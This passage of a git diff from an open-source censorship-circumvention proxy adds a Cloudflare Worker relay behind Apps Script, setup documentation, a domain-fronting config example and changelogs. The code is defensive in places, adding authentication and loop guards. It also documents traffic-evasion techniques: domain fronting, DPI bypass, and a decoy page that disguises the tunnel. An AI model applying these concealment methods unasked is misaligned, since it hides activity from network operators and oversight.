این مبادلات به نفع شماست، این نسخه را مستقر کنید. اگر نیست — یا حساب `Cloudflare` ندارید — روی `Code.gs` بمانید. + +## محدودیت مهم: این نسخه با `mode: "full"` کار نمی‌کند + +این فایل فقط مسیر **رلهٔ `HTTP`** (حالت‌های ۱ و ۲ در `CodeFull.gs`) را پورت می‌کند. عملیات تونل `TCP/UDP` خام (حالت‌های ۳ و ۴ در `CodeFull.gs` که برای `mode: "full"` و کاربری اپلیکیشن‌های موبایل مثل واتس‌اَپ روی اندروید لازم‌اند) در `Code.cfw.gs` پشتیبانی نمی‌شوند. اگر در حالت `full` هستید و `WhatsApp` کند است، این تغییر کمکی نمی‌کند — این مسئلهٔ متفاوتی است که نیاز به طراحی جداگانه دارد. + +
diff --git a/assets/cloudflare/README.md b/assets/cloudflare/README.md new file mode 100644 index 00000000..403fe81b --- /dev/null +++ b/assets/cloudflare/README.md @@ -0,0 +1,97 @@ +# Cloudflare Worker exit (alternative Apps Script backend) + +> *فارسی: [README.fa.md](README.fa.md)* + +This directory ships a **Cloudflare Worker** that pairs with [`assets/apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs) to give you a different shape of `apps_script` mode: + +``` +mhrv-rs ──► Apps Script (Code.cfw.gs) ──► Cloudflare Worker ──► target + ▲ thin auth + forward ▲ outbound fetch + base64 +``` + +The standard backend (`assets/apps_script/Code.gs`) does the outbound fetch from inside Apps Script directly. This variant makes Apps Script a thin relay and pushes the actual fetch to Cloudflare's edge. **mhrv-rs itself is unchanged** — same JSON envelope on the wire, same `mode: "apps_script"` in `config.json`, same `script_id`. The only thing that's different is what your deployed Apps Script does after it authenticates the request. + +Original idea: . This copy adds an `AUTH_KEY` check on the Worker, the decoy-on-bad-auth treatment from `Code.gs`, and a hop-loop guard. + +## When this is worth it + +✅ Browsing, page navigation, chat-style traffic — visibly snappier. Per-call latency drops from the ~250-500 ms Apps Script floor to ~10-50 ms at the CF edge. +✅ Telegram realtime — small frequent messages benefit most. +✅ Networks where the Apps Script *runtime* quota (90 min/day on consumer Google accounts) is what you hit before the URL-fetch count cap. GAS spends almost no time per call here. + +❌ **No `UrlFetchApp` daily-count relief today.** mhrv-rs's HTTP relay path emits a single-URL envelope per request, never the `q: [...]` batch shape, so each user request still consumes one GAS UrlFetchApp call regardless of which `Code.gs` variant is deployed. The `Code.cfw.gs` ↔ Worker path *is* batch-aware (chunks at 40, Worker fans out via `Promise.all`, costs `ceil(N / 40)` per batch instead of N), but that branch is unreachable from any shipping client. **Until/unless mhrv-rs grows HTTP-relay batching, the daily 20k-fetch ceiling is unchanged from `Code.gs`.** The ready batching support is left in place for forward compatibility — it costs nothing and goes live the day a batching client lands. +❌ YouTube long-form video — gets **worse**, not better. Apps Script allows ~6 min wall per execution; CF Workers cap at 30 s. The SABR cliff arrives sooner. Stay on `Code.gs` for YouTube-heavy use. +❌ Sites behind Cloudflare anti-bot (Twitter/X, OpenAI, etc.) — exit IP becomes a Workers IP, which CF's own anti-bot fingerprints as a worker-internal request. Often *stricter* than a Google IP. This is a separate problem from DPI bypass and neither variant fixes it. +❌ When/if HTTP-relay batching ships, the 30 s wall would apply to **the slowest URL in each chunk**, not per-URL — a single hung target could drag a 40-URL chunk to timeout. mhrv-rs's existing per-item retry would absorb this, but it's a behavioral change vs the per-URL `fetchAll` wall under `Code.gs`. (Inert today since no batching client exists.) + +## Setup + +You need three matching strings: an `AUTH_KEY` shared between `worker.js`, `Code.cfw.gs`, and your `mhrv-rs` `config.json`. Pick a strong random secret once and paste it into all three. + +### 1. Deploy the Worker + +1. Open → **Workers & Pages** → **Create** → **Hello World** → **Deploy**. +2. Click **Edit code**, delete the template, and paste the contents of [`worker.js`](worker.js). +3. Change the `AUTH_KEY` constant near the top of the file to your strong secret. +4. **Deploy**. Copy the `*.workers.dev` URL — you'll need it next. + +### 2. Deploy the Apps Script + +1. Open while signed into your Google account → **New project** → delete the default code. +2. Paste the contents of [`../apps_script/Code.cfw.gs`](../apps_script/Code.cfw.gs). +3. Set both constants at the top: + - `AUTH_KEY` — the same secret you set in `worker.js`. + - `WORKER_URL` — the full `https://…workers.dev` URL of the Worker you just deployed (must include the scheme). +4. **Deploy → New deployment → Web app**: *Execute as* = **Me**, *Who has access* = **Anyone**. +5. Copy the **Deployment ID**. + +### 3. Point mhrv-rs at the Apps Script + +In `config.json` (or via the UI's config form): + +```json +{ + "mode": "apps_script", + "script_id": "PASTE_DEPLOYMENT_ID_HERE", + "auth_key": "SAME_SECRET_AS_BOTH_FILES_ABOVE" +} +``` + +That's it. mhrv-rs doesn't need to know Cloudflare exists; from its perspective, the `script_id` deployment behaves like any other. If you have multiple deployments (some plain, some CFW), `script_ids: [...]` round-robins across all of them and the parallel-relay fan-out still works. + +## Why three matching `AUTH_KEY`s + +- **mhrv-rs ↔ Apps Script**: prevents random POSTs to your `*.googleusercontent.com` deployment from being relayed. Probes that don't carry the key get the decoy HTML page (`DIAGNOSTIC_MODE = false` in `Code.cfw.gs`), so the deployment looks like a forgotten placeholder rather than a tunnel. +- **Apps Script ↔ Worker**: prevents random POSTs to your `*.workers.dev` Worker from being relayed if the Worker URL ever leaks. Without this check the Worker becomes an open HTTP-relay for arbitrary attackers. The upstream `mhr-cfw` Worker omits it; this copy adds it back. + +If you want compartmentalization (different secret on each leg), edit `Code.cfw.gs` to send a different `k` to the Worker than the one it accepts from mhrv-rs. The single-secret setup is the simplest correct configuration. + +## Verifying it works + +Same procedure as the standard backend: open through the proxy. You should see a Cloudflare-owned IP (since the actual fetch now exits Cloudflare's network), not a Google-owned one as you would with `Code.gs`. If you see your real IP, the proxy isn't being used; if you see a Google IP, you deployed `Code.gs` instead of `Code.cfw.gs`. + +The `Test` button in the desktop UI still works — it does a HEAD relay through whichever Apps Script deployment you configured. + +## Trade-off table at a glance + +| Axis | `Code.gs` (standard) | `Code.cfw.gs` (this variant) | +|---|---|---| +| Per-call latency floor | ~250-500 ms (GAS internal hop) | ~10-50 ms (CF edge) | +| Apps Script `UrlFetchApp`/day, **what mhrv-rs sends today** | 1 quota / request | 1 quota / request — same (mhrv-rs only emits single-URL envelopes) | +| Apps Script `UrlFetchApp`/day, **if a future client batches** | N quota (one per URL via `fetchAll`) | `ceil(N / 40)` quota (chunks at 40, Worker fans out via `Promise.all`) | +| CF Workers requests/day (free tier) | n/a | 100 000 — far above what GAS can feed it; not the binding ceiling | +| Apps Script runtime/day | 90 min, often binding | 90 min, rarely binding | +| Per-execution wall budget | ~6 min, per-URL | 30 s, per-call (would become per-chunk if batching ships) | +| Per-response size cap | ~50 MB (Apps Script doc'd) | bounded by Worker memory (128 MB free tier); ~tens of MB in practice with the base64 conversion | +| Response header casing | preserved as origin sent it | lowercased (Workers' `Headers.forEach` normalises). Matters only for downstream tools that compare header names case-sensitively; mhrv-rs is case-insensitive. | +| YouTube long-form playback | OK (6-min cliff) | WORSE (30-s cliff) | +| Telegram / chat snappiness | baseline | noticeably better | +| Cloudflare anti-bot on target | datacenter IP | worker-internal IP (often stricter) | +| Spreadsheet response cache | available (opt-in) | not in this variant | +| Deployment complexity | 1 thing to maintain | 2 things to keep in sync | + +If those trade-offs land on the right side for you, deploy this variant. If not — or if you don't have a Cloudflare account — stay on `Code.gs`. + +## Important limitation: not compatible with `mode: "full"` + +`Code.cfw.gs` only ports the HTTP-relay path (modes 1 + 2 in `CodeFull.gs`). The raw-TCP/UDP tunnel ops that `mode: "full"` depends on (modes 3 + 4 in `CodeFull.gs` — required for Android full-mode coverage of WhatsApp / Telegram / messengers / any non-HTTPS-MITM-able app) are **not** ported. If you're on full mode and looking for messenger speed-ups, this variant won't help — that's a different design that would need to ride on top of Cloudflare's TCP Sockets API + Durable Objects, with no equivalent for UDP. See the discussion in [issue #380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380) for context. diff --git a/assets/cloudflare/worker.js b/assets/cloudflare/worker.js new file mode 100644 index 00000000..f672194b --- /dev/null +++ b/assets/cloudflare/worker.js @@ -0,0 +1,302 @@ +/** + * MHR-CFW Exit Worker — Cloudflare Workers companion to Code.cfw.gs. + * + * Architecture (alternative backend, opt-in): + * mhrv-rs → Apps Script (Code.cfw.gs) → THIS Worker → target site + * + * Apps Script in this configuration is a thin relay: it authenticates + * the inbound request from mhrv-rs, then forwards to this Worker. The + * Worker does the actual outbound fetch(es), base64-encodes the body, + * and returns the same JSON envelope shape the standard Code.gs would + * have returned. The mhrv-rs client is unaware that the work happened + * on Cloudflare — same `{u, m, h, b, ct, r}` request, same `{s, h, b}` + * response. + * + * Two request shapes are accepted: + * 1. Single: { k, u, m, h, b, ct, r } → { s, h, b } + * 2. Batch: { k, q: [{u,m,h,b,ct,r}, ...] } → { q: [{s,h,b} | {e}, ...] } + * + * The batch shape is what makes this design actually save Apps Script + * UrlFetchApp quota. Without it, Code.cfw.gs would have to do + * `UrlFetchApp.fetchAll(N worker calls)` to fan out an N-URL batch, + * which costs N quota — same as the standard Code.gs. With it, + * Code.cfw.gs does ONE fetch to this Worker (1 quota) and we fan out + * inside the Worker via Promise.all. For a typical mhrv-rs batch of + * 5-30 URLs that's a 5-30x reduction in GAS daily quota. + * + * Why bother: + * - Faster per-call latency (~10-50 ms at CF edge vs ~250-500 ms in + * Apps Script), which matters most for many small requests + * (Telegram realtime, page navigation chatter). + * - Apps Script *runtime* quota (90 min/day on consumer accounts) + * stretches further because GAS spends each call almost entirely + * on its single forward to the Worker rather than on body fetch + * + base64 + header munging. + * - With the batch shape (above), Apps Script *UrlFetchApp count* + * quota also stretches roughly Nx for an N-URL batch — typically + * 5-30x for mhrv-rs. + * + * What this does NOT change: + * - Cloudflare anti-bot challenges on the destination. The exit IP + * becomes a Workers IP (inside Cloudflare's network), which CF's + * own anti-bot can fingerprint as a worker-internal request — + * often *stricter* than a Google IP. This is a different problem + * than DPI bypass; see docs. + * - YouTube long-form streaming gets WORSE, not better. Apps Script + * allows ~6 min wall per execution; CF Workers cap at 30s wall. + * The SABR cliff arrives sooner. Keep the standard `apps_script` + * mode (Code.gs) for YouTube-heavy use. + * - The 30s wall now applies to the *slowest URL in the batch* + * because Promise.all only resolves once every fetch finishes. + * mhrv-rs already retries failed batch items individually, so a + * single slow target degrades to a per-item timeout rather than + * a hard failure — but it's a real behavioural difference vs the + * per-URL wall under the standard Code.gs path. + * + * Deployment: + * 1. Cloudflare dashboard → Workers & Pages → Create → Hello World + * 2. Edit code → delete the template, paste this entire file + * 3. Change AUTH_KEY below to the same value you set in Code.cfw.gs + * AND in your mhrv-rs config.json (auth_key). All three must match. + * 4. Deploy. Note the *.workers.dev URL; paste it into Code.cfw.gs as + * WORKER_URL. + * + * SECURITY NOTE: this Worker accepts unauthenticated POSTs from anyone + * who knows the URL unless AUTH_KEY is changed. The check below is + * cheap; do not skip it. The point of the AUTH_KEY is to keep the + * Worker from becoming an open HTTP-relay for arbitrary attackers if + * its URL leaks. Same secret as Code.cfw.gs by convention — if you + * want compartmentalisation, use a different one and have Code.cfw.gs + * forward both keys. + * + * Hardened over the upstream mhr-cfw worker.js by adding the AUTH_KEY + * check and batch handling. Upstream credit: github.com/denuitt1/mhr-cfw. + */ + +const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; +const DEFAULT_AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; + +// Loop-prevention tag. The Worker tags its OUTBOUND request to the +// target with `x-relay-hop: 1` (see processOne). If a subsequent +// request comes back into the Worker with that header set, the Worker +// has been chained back to itself somehow — most likely the user's +// `item.u` resolved to this Worker's own URL. Bail out instead of +// fetching to avoid a stack-overflow loop. +// +// Note: Code.cfw.gs does NOT set this header on its GAS→Worker call +// (and could not check for it on inbound anyway — Apps Script's +// doPost event doesn't expose request headers). So this guard +// catches Worker-↔-Worker cycles, not GAS-↔-Worker cycles. The +// `targetUrl.hostname === selfHost` check in processOne is the +// primary defence for the common misconfiguration. +const RELAY_HOP_HEADER = "x-relay-hop"; + +// Soft cap on batch size. Cloudflare Workers allow up to 50 +// subrequests per invocation on the free tier (1000 on paid). We +// keep a margin for retries and internal CF traffic. mhrv-rs's +// typical batches are 5-30 URLs so this is rarely the binding limit. +// +// **Must match `WORKER_BATCH_CHUNK` in Code.cfw.gs.** If the GAS side +// chunks at a different size, oversized chunks here return a top-level +// error and the entire chunk's slots fail. Tune both together. +const MAX_BATCH_SIZE = 40; + +// Hop-by-hop headers and headers Cloudflare manages itself. Stripped +// before forwarding so the inbound request doesn't poison the outbound. +// Kept in sync with Code.cfw.gs / Code.gs SKIP_HEADERS so the Worker +// is correct as a defence-in-depth even when called directly (the +// AUTH_KEY check is the primary gate, but GAS scrubs first in the +// normal flow). +const SKIP_HEADERS = new Set([ + "host", + "connection", + "content-length", + "transfer-encoding", + "proxy-connection", + "proxy-authorization", + "priority", + "te", +]); + +export default { + async fetch(request) { + // Fail-closed if the deployer forgot to change AUTH_KEY from the + // template default. Without this guard a forgotten edit would + // accept any client that also happens to send the placeholder — + // effectively running as an open relay. Prefer a loud 500 over + // a silent open door. + if (AUTH_KEY === DEFAULT_AUTH_KEY) { + return json({ e: "configure AUTH_KEY in worker.js" }, 500); + } + + if (request.method !== "POST") { + return json({ e: "method not allowed" }, 405); + } + + if (request.headers.get(RELAY_HOP_HEADER) === "1") { + return json({ e: "loop detected" }, 508); + } + + let req; + try { + req = await request.json(); + } catch (_err) { + return json({ e: "bad json" }, 400); + } + + if (!req || req.k !== AUTH_KEY) { + // Same shape as Code.cfw.gs unauthorized so downstream errors are + // uniform. The Worker URL is generally not user-discoverable; the + // GAS in front of it is the public surface, and probes hit GAS + // first. We don't bother with the decoy-HTML treatment here. + return json({ e: "unauthorized" }, 401); + } + + const selfHost = new URL(request.url).hostname; + + // Batch mode: { k, q: [{u,m,h,b,ct,r}, ...] }. Process all items in + // parallel via Promise.all. Per-item failures are per-item `{e}`s in + // the response array; the envelope itself stays 200 unless the batch + // is malformed at the top level. + if (Array.isArray(req.q)) { + if (req.q.length === 0) return json({ q: [] }); + if (req.q.length > MAX_BATCH_SIZE) { + return json({ + e: "batch too large (" + req.q.length + " > " + MAX_BATCH_SIZE + ")", + }, 400); + } + const results = await Promise.all( + req.q.map((item) => processOne(item, selfHost).catch((err) => ({ + e: "fetch failed: " + String(err), + }))) + ); + return json({ q: results }); + } + + // Single mode: { k, u, m, h, b, ct, r } + let result; + try { + result = await processOne(req, selfHost); + } catch (err) { + return json({ e: "fetch failed: " + String(err) }, 502); + } + if (result.e) { + // Per-item validation errors get HTTP 400 in single mode so + // mhrv-rs sees the same shape as in standard Code.gs ("bad url" + // etc are already client-error-coded there). + return json(result, 400); + } + return json(result); + }, +}; + +/** + * Process one item, whether it came in as the top-level single + * request or as one slot of a batch. Returns a plain object — never + * throws to the caller; Promise.all's .catch above only triggers on + * exceptions from this function's own internals (programmer error). + * + * Result shape mirrors what Code.gs would return for the same item: + * - Success: { s: status, h: {...}, b: base64Body } + * - Validation / fetch failure: { e: "..." } + */ +async function processOne(item, selfHost) { + if (!item || typeof item !== "object") { + return { e: "bad item" }; + } + if (!item.u || typeof item.u !== "string" || !/^https?:\/\//i.test(item.u)) { + return { e: "bad url" }; + } + + let targetUrl; + try { + targetUrl = new URL(item.u); + } catch (_err) { + return { e: "bad url" }; + } + if (targetUrl.hostname === selfHost) { + return { e: "self-fetch blocked" }; + } + + const headers = new Headers(); + if (item.h && typeof item.h === "object") { + for (const [k, v] of Object.entries(item.h)) { + if (SKIP_HEADERS.has(k.toLowerCase())) continue; + try { + headers.set(k, v); + } catch (_err) { + // Worker rejects some headers (e.g. forbidden ones); skip + // rather than fail the whole item. + } + } + } + headers.set(RELAY_HOP_HEADER, "1"); + + const method = (item.m || "GET").toUpperCase(); + const fetchOptions = { + method, + headers, + redirect: item.r === false ? "manual" : "follow", + }; + + // Code.gs/UrlFetchApp tolerates a body on GET/HEAD (browsers don't + // do this, but custom clients sometimes do); Workers' native fetch + // throws TypeError if you set a body on a body-prohibited method. + // To match Code.gs's permissiveness, silently drop the body for + // those methods rather than failing the whole item. + const bodyAllowed = method !== "GET" && method !== "HEAD"; + if (item.b && bodyAllowed) { + try { + const binary = Uint8Array.from(atob(item.b), (c) => c.charCodeAt(0)); + fetchOptions.body = binary; + if (item.ct && !headers.has("content-type")) { + headers.set("content-type", item.ct); + } + } catch (_err) { + return { e: "bad body base64" }; + } + } + + let resp; + try { + resp = await fetch(targetUrl.toString(), fetchOptions); + } catch (err) { + return { e: "fetch failed: " + String(err) }; + } + + const buffer = await resp.arrayBuffer(); + const uint8 = new Uint8Array(buffer); + + // Avoid call-stack overflow from String.fromCharCode.apply on big + // bodies — chunk the conversion. + let binary = ""; + const chunkSize = 0x8000; + for (let i = 0; i < uint8.length; i += chunkSize) { + binary += String.fromCharCode.apply(null, uint8.subarray(i, i + chunkSize)); + } + const base64 = btoa(binary); + + // Note: Headers.forEach delivers keys lowercased per the Fetch + // spec, whereas Code.gs's getAllHeaders preserves the origin's + // casing. mhrv-rs treats headers case-insensitively, but anything + // downstream that does a case-sensitive string compare will see + // a backend-dependent difference. There is no Workers API to + // recover the origin casing, so we accept the divergence. + const responseHeaders = {}; + resp.headers.forEach((v, k) => { + responseHeaders[k] = v; + }); + + return { + s: resp.status, + h: responseHeaders, + b: base64, + }; +} + +function json(obj, status = 200) { + return new Response(JSON.stringify(obj), { + status, + headers: { "content-type": "application/json" }, + }); +} diff --git a/assets/launchers/run.bat b/assets/launchers/run.bat index 11748d99..bf5939c3 100644 --- a/assets/launchers/run.bat +++ b/assets/launchers/run.bat @@ -60,10 +60,21 @@ if not "%UI_EXIT%"=="0" ( echo - running inside RDP or a VM without GPU acceleration echo - antivirus blocking the exe — whitelist the folder and retry echo. - echo Copy everything above and open an issue on: - echo https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues + echo You can still use mhrv-rs without the UI. Run the CLI directly: + echo. + echo mhrv-rs.exe + echo. + echo Set your config in %%APPDATA%%\mhrv-rs\config\config.json (or + echo place a config.json next to mhrv-rs.exe in this folder), then + echo point your browser proxy at 127.0.0.1:8085 (HTTP) or + echo 127.0.0.1:8086 (SOCKS5). The CLI is the same proxy without + echo the UI shell, so all functionality is available. + echo. + echo Falling back to the CLI now so you can keep using the proxy. + echo Press Ctrl+C in the CLI window to stop it. echo --------------------------------------------------- - pause + echo. + mhrv-rs.exe ) ) diff --git a/config.google-only.example.json b/config.direct.example.json similarity index 88% rename from config.google-only.example.json rename to config.direct.example.json index 890f966d..c0a95948 100644 --- a/config.google-only.example.json +++ b/config.direct.example.json @@ -1,5 +1,5 @@ { - "mode": "google_only", + "mode": "direct", "google_ip": "216.239.38.120", "front_domain": "www.google.com", "listen_host": "127.0.0.1", diff --git a/config.fronting-groups.example.json b/config.fronting-groups.example.json new file mode 100644 index 00000000..57bd8de9 --- /dev/null +++ b/config.fronting-groups.example.json @@ -0,0 +1,52 @@ +{ + "mode": "direct", + "google_ip": "216.239.38.120", + "front_domain": "www.google.com", + "listen_host": "127.0.0.1", + "listen_port": 8085, + "socks5_port": 8086, + "log_level": "info", + "verify_ssl": true, + "fronting_groups": [ + { + "name": "vercel", + "ip": "76.76.21.21", + "sni": "react.dev", + "domains": [ + "vercel.com", + "vercel.app", + "vercel.dev", + "vercel.live", + "vercel.sh", + "nextjs.org", + "now.sh", + "cursor.com", + "ai-sdk.dev" + ] + }, + { + "name": "fastly", + "ip": "151.101.1.140", + "sni": "www.python.org", + "domains": [ + "reddit.com", + "redditstatic.com", + "redditmedia.com", + "redd.it", + "githubassets.com", + "githubusercontent.com", + "pypi.org", + "fastly.com" + ] + }, + { + "name": "netlify", + "ip": "35.157.26.135", + "sni": "letsencrypt.org", + "domains": [ + "netlify.app", + "netlify.com" + ] + } + ] +} diff --git a/docs/changelog/v1.6.1.md b/docs/changelog/v1.6.1.md new file mode 100644 index 00000000..d5e72c8d --- /dev/null +++ b/docs/changelog/v1.6.1.md @@ -0,0 +1,4 @@ + +• پایداری چرخه‌ٔ سشن VPN در اندروید ([#187](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/187)): پنج رفع باگ کوچک ولی واقعی در سرویس VPN اندروید: (۱) دکمهٔ Connect/Disconnect حالا روی state-flow `VpnState.isRunning` گیت میشه (با backstop ۱۲ ثانیه‌ای) به جای تایمر ثابت ۲ ثانیه — جلوی race condition بین Stop و Connect رو می‌گیره که قبلاً منجر به `Address already in use` می‌شد. (۲) `Tun2proxy.stop()` حالا با timeout ۲ ثانیه‌ای بسته شده تا اگر روی native call hang کنه، کل teardown thread رو نگه نداره. (۳) رفع نشت file descriptor بین `detachFd()` و `Thread.start()` — اگه start بخاطر OOM throw می‌کرد، fd یتیم می‌شد. (۴) doc-comment گمراه‌کننده در teardown اصلاح شد. (۵) handler crash trap حالا `Log.e` رو در try/catch می‌پیچه تا اگه خود لاگ throw کنه، handler بازگشتی نشه +--- +• Android VPN session lifecycle reliability ([#187](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/187)): five small but real fixes in the Android VPN service. (1) Connect/Disconnect button is now gated on the `VpnState.isRunning` state flow with a 12 s backstop instead of a fixed 2 s `transitionCooldown` timer — closes the race window where users tapping Connect right after Stop would hit "Address already in use" because the previous teardown's listener-socket release hadn't completed yet. (2) `Tun2proxy.stop()` is now wrapped in a 2 s `join()` timeout — if the native call hangs, the bounded tun2proxy thread join + bounded `rt.shutdown_timeout` below it still release the listener port instead of holding the teardown thread. (3) File-descriptor leak fixed between `parcelFd.detachFd()` and `Thread.start()` — if `start()` threw (OOM under memory pressure), the detached fd had no owner and leaked for the process lifetime; now adopted into a fresh `ParcelFileDescriptor` purely so we can `close()` it. (4) Misleading teardown doc-comment rewritten — the "step 2 closes the TUN fd to force EBADF on read" claim has been factually wrong since `detachFd` landed; corrected so future debuggers don't chase a phantom safety net. (5) Recursive crash trap in `MhrvApp`'s uncaught-exception handler — `Log.e` is now wrapped in try/catch so a logd failure during exception logging falls through to the previous handler with the real exception diff --git a/docs/changelog/v1.6.2.md b/docs/changelog/v1.6.2.md new file mode 100644 index 00000000..402d8a5e --- /dev/null +++ b/docs/changelog/v1.6.2.md @@ -0,0 +1,4 @@ + +• رفع باگ "همهٔ دانلودها روی ۲۵۶ کیلوبایت قطع میشن" ([#162](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/162)): در relay range-parallel، اگه validation هر chunk رد می‌شد (مثلاً Apps Script هدر `Content-Range` رو حذف می‌کرد، یا origin روی chunkهای بعدی به جای 206 یه 200 برمی‌گردوند)، fallback اشتباهی پاسخ probe (یعنی فقط ۲۵۶ کیلوبایت اول) رو به‌عنوان فایل کامل برمی‌گردوند. مرورگر `HTTP 200` با `Content-Length=262144` می‌دید و دانلود رو "کامل" تلقی می‌کرد. حالا fallback یک GET تک‌مرحله‌ای جدید بدون Range هدر می‌فرسته که Apps Script کل URL رو fetch کنه (تا سقف ۵۰ مگ). برای فایل‌های بزرگ‌تر کندتره از مسیر parallel، ولی پاسخ کامل می‌ده — که اون چیزی هست که اهمیت داره. ۲ کاربر مستقل این رو ریپورت کردن (Ehsan، Recruit1992) +--- +• Fix "every download capped at 256 KB" bug ([#162](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/162)): in range-parallel relay, when any chunk failed validation (e.g. Apps Script stripping the `Content-Range` header on follow-up chunks, or origin returning 200-instead-of-206 on later chunks), the fallback path silently returned the probe response (the first 256 KiB) as if it were the full file. Browsers saw `HTTP 200` with `Content-Length=262144` and treated the download as complete. The fallback now does a fresh single GET without the Range header, letting Apps Script fetch the full URL (up to its 50 MiB cap). Slower than the parallel path for large files, but produces a complete response — which is what matters. Two independent users (Ehsan, Recruit1992) reported this; closed-loop with both diff --git a/docs/changelog/v1.6.3.md b/docs/changelog/v1.6.3.md new file mode 100644 index 00000000..7be78d25 --- /dev/null +++ b/docs/changelog/v1.6.3.md @@ -0,0 +1,4 @@ + +• رفع باگ "نوتیفیکیشن سرور اندروید پورت اشتباه SOCKS5 رو نشون می‌داد" ([#211](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/211)): با تنظیمات پیش‌فرض اندروید (`listenPort=8080`, `socks5Port=1081`)، نوتیفیکیشن می‌نوشت `Routing via SOCKS5 127.0.0.1:8081` که اشتباه بود — listener واقعی روی `1081` اجرا می‌شد. هر کاربری که پروکسی تلگرام رو روی پورت نوتیفیکیشن (8081) ست می‌کرد، در سکوت fail می‌شد. علت: تابع `buildNotif` به‌جای خوندن `cfg.socks5Port`، hardcode می‌کرد `proxyPort + 1`. حالا متن نوتیفیکیشن همون منطق elvis fallback `cfg.socks5Port ?: (cfg.listenPort + 1)` رو که در تنظیم listener واقعی استفاده می‌شه می‌خونه و علاوه بر SOCKS5، پورت HTTP رو هم نشون می‌ده: `HTTP 127.0.0.1:8080 · SOCKS5 127.0.0.1:1081`. ۲ کاربر مستقل ریپورت کردن (vpnineh، l3est) +--- +• Fix "Android server notification showed wrong SOCKS5 port" bug ([#211](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/211)): with the default Android config (`listenPort=8080`, `socks5Port=1081`), the foreground-service notification read `Routing via SOCKS5 127.0.0.1:8081` — wrong, since the real listener was on `1081`. Anyone configuring Telegram (or any per-app SOCKS5 client) against the notification value silently failed. Cause: `buildNotif` hardcoded `proxyPort + 1` instead of reading `cfg.socks5Port`. The notification now uses the same elvis fallback `cfg.socks5Port ?: (cfg.listenPort + 1)` that the actual listener uses, and shows both ports for clarity: `HTTP 127.0.0.1:8080 · SOCKS5 127.0.0.1:1081`. Two independent users (vpnineh, l3est) reported this diff --git a/docs/changelog/v1.6.4.md b/docs/changelog/v1.6.4.md new file mode 100644 index 00000000..0461620f --- /dev/null +++ b/docs/changelog/v1.6.4.md @@ -0,0 +1,4 @@ + +• رفع باگ "L7 multiplexer در Full mode batch نمی‌کنه" ([#231](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/231)): در حالت Full، انتظار می‌رفت که چند op به یک batch HTTP request به Apps Script ترکیب بشن (`batch: 5 ops` یا `batch: 10 ops`)، ولی log نشون می‌داد همیشه `batch: 1 ops` — یعنی هر op جدا یه round-trip Apps Script می‌گرفت (که هر کدوم 2 تا 7 ثانیه طول می‌کشن). علت: loop دریافت پیام بلافاصله بعد از اولین message با `try_recv()` (non-blocking) صف رو drain می‌کرد، بدون pause برای جمع‌آوری بقیه ops. **Fix:** بعد از اولین op، یه پنجرهٔ ۸ میلی‌ثانیه‌ای باز می‌مونه تا opهای بعدی (مثل parallel fetches، HTTP/2 streams) همون batch رو پر کنن. ۸ms در مقابل ~۲ تا ۷ ثانیه RTT Apps Script اصلاً ناچیزه ولی efficiency batching رو برمی‌گردونه. ریپورت شده توسط w0l4i با log واضح +--- +• Fix "L7 multiplexer not batching in Full mode" bug ([#231](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/231)): in `full` mode, multiple ops should coalesce into a single batched HTTP request to Apps Script (`batch: 5 ops` or `batch: 10 ops`), but logs showed `batch: 1 ops` consistently — each op got its own Apps Script round-trip (2-7 s each). Cause: the receive loop drained the channel via `try_recv()` (non-blocking) immediately after the first message arrived, with no window to let concurrent ops accumulate. **Fix:** after the first op lands, hold the buffer open for an 8 ms coalescing window so concurrent ops (parallel fetches, HTTP/2 stream openings, etc.) land in the same batch. 8 ms is rounding error against the ~2-7 s Apps Script RTT but restores the entire batching premise. Reported by w0l4i with a clean log snippet diff --git a/docs/changelog/v1.6.5.md b/docs/changelog/v1.6.5.md new file mode 100644 index 00000000..ab870666 --- /dev/null +++ b/docs/changelog/v1.6.5.md @@ -0,0 +1,10 @@ + +• اضافه شدن twitter.com به URL normalization اکس/توییتر ([#245](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/245)): قبلاً normalization GraphQL URL فقط روی `x.com` کار می‌کرد. کاربری که از extension "Control Panel for Twitter" استفاده می‌کنه که همه‌چی رو به `twitter.com` redirect می‌کنه، URL shortening رو از دست می‌داد و درخواست‌هاش به Apps Script `URI Too Long` می‌گرفت. حالا match هر دو domain رو می‌گیره. ممنون از Parsa307 +• امکان کپی log در نسخهٔ اندروید ([#255](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/255)): دکمهٔ Copy کنار Clear در Live Log اضافه شد. خط‌های log الان قابل selection هستن. تا قبل از این، گرفتن log از گوشی نیازمند `adb logcat` بود — برای کاربرهایی که issue با logcat تجربه ندارن، debug کردن سخت بود. ممنون از @dazzling-no-more +• اضافه کردن چندین deployment ID به‌صورت یکجا در نسخهٔ اندروید ([#257](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/257)): فیلد "+ Add" حالا multi-line هست و paste کردن لیست IDها (با newline، کاما، یا semicolon جدا شده) رو می‌پذیره. paste در یه entry موجود هم automatic بهش split و expand می‌شه. تا قبل از این، اضافه کردن ۶ تا ID نیازمند ۶ بار tap "+ Add" بود. ممنون از @dazzling-no-more +• رفع باگ "google_only mode: plain HTTP proxy requests are not supported" ([#256](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/256)): تایپ کردن `http://example.com` (بدون https) در browser در حالت google_only یه ۵۰۲ می‌داد، در حالی که `https://example.com` (CONNECT) خوب fall-through می‌کرد به direct TCP. حالا plain HTTP proxy request هم passthrough می‌شه (با حفظ `upstream_socks5` اگه ست شده). ۴ تا unit test جدید برای parsing absolute-form URI، fallback به Host header، و edge cases IPv6. ممنون از @dazzling-no-more +--- +• Add twitter.com to X/Twitter URL normalization ([#245](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/245)): the GraphQL `?variables=...` shortening previously only matched `x.com`. Users running the "Control Panel for Twitter" extension (which redirects everything back to `twitter.com`) lost the shortening and hit 